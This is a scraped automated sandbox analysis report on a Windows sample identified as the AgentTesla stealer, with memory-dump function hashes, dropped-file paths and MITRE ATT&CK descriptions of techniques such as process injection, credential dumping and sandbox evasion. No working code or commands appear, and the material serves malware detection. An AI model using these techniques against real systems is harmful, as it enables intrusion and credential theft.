Instruction Fuzzy Hash: 2E112B71F001148BDF149A28D99079E77B7EB85310F1004EAE10FDF346CB329E428B92

Function 26ABD8F9 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2629351356.0000000026AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 26AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_26ab0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: beac9dfbe495f90dc5d2ace78aba24ced209b05d1825f985db8777fc1ae48dd5
Instruction ID: a72a30d0dbc96b3d127d5679ba794e9eb9831be1fe51e59c0dffbc391b0516c2
Opcode Fuzzy Hash: beac9dfbe495f90dc5d2ace78aba24ced209b05d1825f985db8777fc1ae48dd5
Instruction Fuzzy Hash: 6301B131F002000FD745EA78C66571A77E6EB8AB10B208469F04FDF396DF29DD424391

Function 26AB6EBA Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2629351356.0000000026AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 26AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_26ab0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a054dde9a9e03ee9c1acdd936fc9ce32314181a16f6b43e8a9021abbf81af6a2
Instruction ID: d5abe183a297cb6a88ff195e537338056a04f8f93743670cdb3e2d8a602fb3bf
Opcode Fuzzy Hash: a054dde9a9e03ee9c1acdd936fc9ce32314181a16f6b43e8a9021abbf81af6a2
Instruction Fuzzy Hash: 1721D3B5D116199FDB00CF9AD984BDEFBB4FF49310F10822AE918B7240D3746544CBA5

Function 26AB6EC0 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2629351356.0000000026AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 26AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_26ab0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30a0526ee22ebbeeb3c389668eeee388a0085e21ba642f9b61aff31189bf65cd
Instruction ID: ce949f52f1a476cb7e8e633993f519e80749c8802c90523105612862da091389
Opcode Fuzzy Hash: 30a0526ee22ebbeeb3c389668eeee388a0085e21ba642f9b61aff31189bf65cd
Instruction Fuzzy Hash: 8811B3B5D112599FDB00CF9AD984ADEFBB4FF49310F10812AE918B7240D3746554CBA5

Function 26AB71EF Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2629351356.0000000026AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 26AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_26ab0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc37b4c50238b3f32435c322fc3e41f52ebc806e22f641193610f292d159e8bc
Instruction ID: 5788e63eb95db618cf71d918c5e4952ecb65b9ad6377e4c371e144f89d22ad97
Opcode Fuzzy Hash: cc37b4c50238b3f32435c322fc3e41f52ebc806e22f641193610f292d159e8bc
Instruction Fuzzy Hash: EB01D436F100158BDB059AB8CD647EF73AAABC8711F04457AE506EB345DE65DC0147D1

Function 26AB7448 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2629351356.0000000026AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 26AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_26ab0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 558a762a05e2b2cfb6e57c71c3c2e17cb494edc6a9e804c060010184df81df11
Instruction ID: e55c49ee79311897ac61c1dfce0405a7fbc0d86173e909702747ea90e3b3109b
Opcode Fuzzy Hash: 558a762a05e2b2cfb6e57c71c3c2e17cb494edc6a9e804c060010184df81df11
Instruction Fuzzy Hash: 92016931B100100BDB14967D9554B1BABDBEBC9721F24883AF50FCB396DEA9ED024391

Function 26AB7446 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2629351356.0000000026AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 26AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_26ab0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05299b448e3cd624aa6baafd51ba8370397a37d1134caccb34a6174de4affb59
Instruction ID: 4130f836c1d833b118d1f666f7e6a6455f211ddee0a2db6b30f007cec7d943ec
Opcode Fuzzy Hash: 05299b448e3cd624aa6baafd51ba8370397a37d1134caccb34a6174de4affb59
Instruction Fuzzy Hash: AE016935B100100BDB14967D9558B1BA7DBEBC9711F24883AF00FCB396DEA9ED024391

Function 26ABD908 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2629351356.0000000026AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 26AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_26ab0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06608bdb83eb38697546789ec45487ea74621c7867fbfb5b7fd23742a1f3b0ef
Instruction ID: 09ff4cf4c4ac1b7f371aeddc2cdc86904a57f0dfd05a90a98ba265973075bd07
Opcode Fuzzy Hash: 06608bdb83eb38697546789ec45487ea74621c7867fbfb5b7fd23742a1f3b0ef
Instruction Fuzzy Hash: 85016D35B102104BD704EA2CD568B1A73DAEB8AB10F208829F04FDF796DF25ED024790

Function 26ABE510 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2629351356.0000000026AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 26AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_26ab0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49bb4ef3e72448d38aa3478fe72bdf133fa5258d0539267e435560799ff926cc
Instruction ID: bcb4177b67883a4b643c12ba4d59bf244d67decda447211feb724e32b46c8b18
Opcode Fuzzy Hash: 49bb4ef3e72448d38aa3478fe72bdf133fa5258d0539267e435560799ff926cc
Instruction Fuzzy Hash: B801D135E102188BEF108A68C48478DFBBDFB46360F10457AE40BEB341E635ED0587C5

Function 26AB9670 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2629351356.0000000026AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 26AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_26ab0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b385c65c855489f7e5af9531c01f364831a99caa4a7ee33325ac442c5eef4b1
Instruction ID: 1a694553a27dce368cf6f47eac7ed37b50b84bef0aa311842f46a449b417ba88
Opcode Fuzzy Hash: 7b385c65c855489f7e5af9531c01f364831a99caa4a7ee33325ac442c5eef4b1
Instruction Fuzzy Hash: 1BE048B2E152445FDB11CAB0CB9538A7B79BB57309F2049E7E449DF143E23ACB059781

Function 26AB9680 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2629351356.0000000026AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 26AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_26ab0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36b7bf3c3d979a56ca67553db47036cafea231787f1e9f5f2c2c00ec16d09e74
Instruction ID: a27f3c9a1e3f0d7e52505a3d281ef1196dab8ccbcd727530d096e1d6a8fa85c7
Opcode Fuzzy Hash: 36b7bf3c3d979a56ca67553db47036cafea231787f1e9f5f2c2c00ec16d09e74
Instruction Fuzzy Hash: 13E012B1E11108ABDB00DEB4CA5574E77ADF756218F2088A5E40EDB202E676DB0197C1

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report ulf4JrCRk2.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Agenttesla

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h0nvwidb.zne.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kfzodzfq.jr2.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sbro5521.szu.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wjxb2rpt.01z.ps1

C:\Users\user\AppData\Local\Temp\nsk335D.tmp

C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr

C:\Users\user\AppData\Roaming\supersystem\panelet\Sgekoder.Vac

C:\Users\user\AppData\Roaming\supersystem\panelet\catalog.txt

C:\Users\user\AppData\Roaming\supersystem\panelet\latrias.reg

C:\Users\user\AppData\Roaming\supersystem\panelet\puquinan.tod

Static File Info

General

File Icon

Static PE Info

Windows Analysis Report
ulf4JrCRk2.exe

Function 00403217 Relevance: 82.6, APIs: 28, Strings: 19, Instructions: 337
stringfilecomCOMMON

Function 0040511A Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 280
windowclipboardmemoryCOMMON

Function 00405D13 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 199
stringCOMMON

Function 004055B1 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159
filestringCOMMON

Function 00403B19 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345
windowstringCOMMON

Function 00403787 Relevance: 49.2, APIs: 15, Strings: 13, Instructions: 216
stringregistrylibraryCOMMON

Function 00402C79 Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203
memoryCOMMON

Function 0040173F Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 147
stringtimeCOMMON

Function 00404FDC Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73
stringwindowCOMMON

Function 00401F68 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73
libraryloaderCOMMON

Function 0040231C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71
registrystringCOMMON

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre